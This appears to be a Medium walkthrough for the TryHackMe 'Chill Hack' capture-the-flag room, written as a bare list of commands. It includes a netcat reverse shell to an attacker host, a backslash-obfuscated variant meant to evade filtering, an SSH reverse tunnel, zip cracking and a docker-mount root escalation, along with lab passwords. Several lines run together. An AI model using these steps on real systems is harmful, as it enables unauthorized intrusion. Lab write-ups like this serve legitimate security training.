TryHackMe: Chill Hack

nmap -Pn <target ip>nmap -Pn -p1000- <target ip>
nmap -A -p21,22,80 <target ip>
nmap --script vuln -p21,22,80 <target ip>
/csss/images//js//secret/
ftp <target ip>username: anonymousls -laget note.txt
cat note.txt
ssh <target ip>
nikto -h http://<target ip>/
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<target ip>/ -x php,txt,html,sh,cgi,bak -q
tcpdump ip proto \\icmp -i tun0
ping -c 10 <attacker ip>
rlwrap nc -lvp 443
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> 443 >/tmp/f
r\m /t\m\p/f;m\k\f\i\f\o /t\m\p/f;c\a\t /t\m\p/f|/b\i\n/s\h -i 2>&1|n\c <attcker ip> 443 >/t\m\p/f
which python
which python3python3 -c 'import pty;pty.spawn("/bin/bash");'
cat /var/www/files/index.php | less
su rootpassword: !@m+her00+@db
sudo -l
sudo /home/apaar/.helpline.sh
sudo -u apaar /home/apaar/.helpline.sh
/bin/bashwhoami
sudo -l
cd /home/apaarls -lacat local.txt
mysql -uroot '-p!@m+her00+@db'
show databases;
use webportal;show tables; -> usersselect * from users;
su aurickpassword: masterpasswordsu anurodhpassword: masterpasswordsu apaarpassword: dontaskdonttell
ss -tunpl
/etc/apache2/sites-enabled/
cd /etc/apache2/sites-enabled/ls -la
cat 000-default.conf
systemctl start ssh.socketsystemctl status ssh.socket
ssh -R 9001:127.0.0.1:9001 <attacker user>@<attacker ip>
http://localhost:9001
username: Aurickpassword: masterpassword
exiftool <filename>
steghide extract -sf ./<file> 
unzip backup.zip
fcrackzip   -u -v -D -p rockyou.txt backup.zip
cat source_code.php
su anurodhpassword: !d0ntKn0wmYp@ssw0rd
id
docker run -v /:/mnt --rm -it alpine chroot /mnt shwhoami
cd /rootls -la
cat proof.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store